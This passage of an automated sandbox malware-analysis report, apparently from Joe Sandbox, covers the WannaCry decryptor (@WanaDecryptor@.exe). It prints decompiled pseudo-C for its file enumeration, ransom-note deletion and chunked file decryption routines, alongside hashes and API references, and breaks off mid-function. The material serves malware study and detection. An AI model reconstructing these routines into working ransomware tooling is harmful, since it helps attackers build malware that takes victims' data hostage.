                                  0x0040d9b9
                                  0x0040d9bc
                                  0x0040d9c3
                                  0x0040d9c5
                                  0x0040d9d1
                                  0x0040d9d3
                                  0x0040d9d4
                                  0x0040d9d6
                                  0x0040d9d6
                                  0x0040da11
                                  0x0040da16
                                  0x00000000
                                  0x0040da1c
                                  0x0040da2c
                                  0x0040da31
                                  0x00000000
                                  0x0040da33
                                  0x0040da33
                                  0x0040da39
                                  0x00000000
                                  0x0040da3b
                                  0x0040da40
                                  0x0040da41
                                  0x0040da80
                                  0x0040da83
                                  0x00000000
                                  0x0040da43
                                  0x0040da43
                                  0x0040da46
                                  0x0040da62
                                  0x0040da69
                                  0x0040da78
                                  0x0040da7c
                                  0x0040da7d
                                  0x00000000
                                  0x0040da48
                                  0x0040da49
                                  0x0040da97
                                  0x0040daa3
                                  0x0040da4b
                                  0x0040da4b
                                  0x0040da4e
                                  0x0040da85
                                  0x0040da8c
                                  0x0040da8d
                                  0x0040da8e
                                  0x0040da90
                                  0x0040da95
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040da95
                                  0x0040da49
                                  0x0040da46
                                  0x0040da41
                                  0x0040da39
                                  0x0040da31
                                  0x0040da16
                                  0x0040d95f
                                  0x0040d944

                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction ID: 869c219edba7a699f97af29913b463c5d84a0a7100ec88bf0606293c61a6210c
                                  • Opcode Fuzzy Hash: 912c8ddbc3f5d0546dfc53f6ab7b6c2a54f01fcb62a7659748a7d661530e9815
                                  • Instruction Fuzzy Hash: BB51803130C2869FD714CF58C840BAB7BD9AF99304F04452DF98A9B382D678D90DCBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004068E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E004068E0(intOrPtr _a4) {
				intOrPtr _t5;
				intOrPtr _t8;
				intOrPtr _t9;

				_t5 = _a4;
				_t8 =  *((intOrPtr*)(_t5 + 4));
				if(_t8 != 0x100) {
					if(_t8 != 0x104 ||  *((intOrPtr*)(_t5 + 8)) != 0x73) {
						goto L7;
					} else {
						return 1;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t5 + 8));
					if(_t9 == 0xd || _t9 == 0x1b) {
						return 1;
					} else {
						L7:
						_push(_t5); // executed
						L00412CB6(); // executed
						return _t5;
					}
				}
			}






                                  0x004068e0
                                  0x004068e4
                                  0x004068ed
                                  0x0040690a
                                  0x00000000
                                  0x00406912
                                  0x00406917
                                  0x00406917
                                  0x004068ef
                                  0x004068ef
                                  0x004068f5
                                  0x00406901
                                  0x0040691a
                                  0x0040691a
                                  0x0040691a
                                  0x0040691b
                                  0x00406920
                                  0x00406920
                                  0x004068f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5280
                                  • String ID:
                                  • API String ID: 2434734067-0
                                  • Opcode ID: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                  • Instruction ID: 7c996b979d0e86874aef4d69ce28bf61b51dac78b1e0fd433df73bfd4df6564a
                                  • Opcode Fuzzy Hash: 7e96320addb5fbfd6a512322df2ba5d045d5938d17d503c07870c62d9cf9f9c3
                                  • Instruction Fuzzy Hash: 45E0B6B97011008AEA20CB04C294A5FA292A7E0714F76C077E1899BAA9C27DCDE1CA1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB60 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • send.WS2_32(?,?,?,00000000), ref: 0040DB71
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction ID: 9f2cde9bc08329bc066051ceec9112dcc508ea1adec728888a2f9463dd607dc2
                                  • Opcode Fuzzy Hash: 3222a83dba255473e0a20e544844f5fa8dd218e70a3b82de0a2cb3badf245f05
                                  • Instruction Fuzzy Hash: D9C04C79204300FFD204CB10CD85F6BB7A9EBD4710F50C90DB98983254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB80 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • recv.WS2_32(?,?,?,00000000), ref: 0040DB91
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction ID: 7776e5be7928a6c2c2562dd3bb1774681ff5e82bf649542f35cb965541f1d725
                                  • Opcode Fuzzy Hash: 1d9f9cd7d87b293edf20ef63389b80cde037e3ff80316bdb179f77fce595cd06
                                  • Instruction Fuzzy Hash: 0BC04CB9204300FFD204CB10CD85F6BB7A9EBD4711F10C90DB98D86254C670EC10DA65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 004026B0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 318fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
				void* _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr _t124;
				char _t125;
				intOrPtr* _t129;
				intOrPtr* _t131;
				intOrPtr* _t135;
				int _t139;
				int _t145;
				int _t146;
				int _t147;
				int _t149;
				int _t154;
				intOrPtr* _t221;
				void _t225;
				intOrPtr* _t226;
				wchar_t* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t242;

				_push(0xffffffff);
				_push(E0041356E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t234;
				_t235 = _t234 - 0x56c;
				_t232 = __ecx;
				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
				 *((intOrPtr*)(_t235 + 0x24)) = 0;
				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
				 *(_t235 + 0x584) = 0;
				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((char*)(_t235 + 0x588)) = 1;
				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
				_t236 = _t235 + 0xc;
				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
				 *(_t236 + 0x18) = _t109;
				if(_t109 != 0xffffffff) {
					while(1) {
						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
						if(_t110 != 0 &&  *_t110 != 0) {
							break;
						}
						_t111 = wcscmp(_t236 + 0x358, ".");
						_t236 = _t236 + 8;
						if(_t111 != 0) {
							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                  0x004026b0
                                  0x004026b2
                                  0x004026bd
                                  0x004026be
                                  0x004026c5
                                  0x004026d3
                                  0x004026db
                                  0x004026e4
                                  0x004026e8
                                  0x004026f1
                                  0x004026fa
                                  0x00402706
                                  0x0040270a
                                  0x00402720
                                  0x00402728
                                  0x0040272e
                                  0x0040273e
                                  0x00402747
                                  0x0040274b
                                  0x004027c2
                                  0x004027c2
                                  0x004027ca
                                  0x00000000
                                  0x00000000
                                  0x004027e1
                                  0x004027e3
                                  0x004027e8
                                  0x004027fb
                                  0x004027fd
                                  0x00402802
                                  0x00402816
                                  0x00402822
                                  0x00402828
                                  0x00402838
                                  0x004028c3
                                  0x004028c5
                                  0x004028ca
                                  0x004028dd
                                  0x004028df
                                  0x004028e4
                                  0x004028f3
                                  0x004028f5
                                  0x004028fa
                                  0x00402905
                                  0x00402909
                                  0x00402914
                                  0x00402916
                                  0x00402923
                                  0x0040293c
                                  0x00402944
                                  0x00402949
                                  0x00402951
                                  0x00000000
                                  0x00402953
                                  0x004028fa
                                  0x004028e4
                                  0x0040283a
                                  0x00402850
                                  0x0040285f
                                  0x00402863
                                  0x0040286e
                                  0x00402870
                                  0x0040287d
                                  0x00402896
                                  0x0040289e
                                  0x004028a3
                                  0x004028ab
                                  0x00402957
                                  0x00402957
                                  0x00402957
                                  0x00402850
                                  0x00402838
                                  0x00402802
                                  0x00402972
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402972
                                  0x0040297d
                                  0x00402983
                                  0x00402987
                                  0x0040298b
                                  0x0040298d
                                  0x0040298d
                                  0x00402995
                                  0x00000000
                                  0x00000000
                                  0x0040299b
                                  0x004029a0
                                  0x004029a2
                                  0x004029a2
                                  0x004029aa
                                  0x004029af
                                  0x004029b7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029b7
                                  0x0040298d
                                  0x004029b9
                                  0x004029b9
                                  0x004029bd
                                  0x004029c1
                                  0x004029c3
                                  0x004029c3
                                  0x004029cb
                                  0x00000000
                                  0x00000000
                                  0x004029d1
                                  0x004029d6
                                  0x004029d8
                                  0x004029d8
                                  0x004029e0
                                  0x004029e5
                                  0x004029ed
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004029ed
                                  0x004029c3
                                  0x004029ef
                                  0x004029ef
                                  0x00402a0c
                                  0x00402a0e
                                  0x00402a16
                                  0x00402a2c
                                  0x00402a2e
                                  0x00402a36
                                  0x00402a3c
                                  0x00402a40
                                  0x00402a47
                                  0x00402a49
                                  0x00402a4d
                                  0x00402a4f
                                  0x00402a4f
                                  0x00402a51
                                  0x00402a5d
                                  0x00402a62
                                  0x00402a66
                                  0x00402a66
                                  0x00402a6a
                                  0x00402a6b
                                  0x00402a70
                                  0x00402a74
                                  0x00402a78
                                  0x00402a7c
                                  0x00402a7f
                                  0x00402a81
                                  0x00402a8e
                                  0x00402a92
                                  0x00402a94
                                  0x00402a98
                                  0x00402aaf
                                  0x00402ab4
                                  0x00402a94
                                  0x00402abe
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac7
                                  0x0040274d
                                  0x00402751
                                  0x00402765
                                  0x0040276e
                                  0x0040276f
                                  0x00402778
                                  0x0040277b
                                  0x0040277f
                                  0x00402790
                                  0x0040279b
                                  0x004027a4
                                  0x004027a5
                                  0x004027aa
                                  0x004027ad
                                  0x004027ad
                                  0x00402ad7
                                  0x00402ae4

                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: 68c0da3c818e992a567790c9a9b65803973eb8845537bfb51ade59474b63f593
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
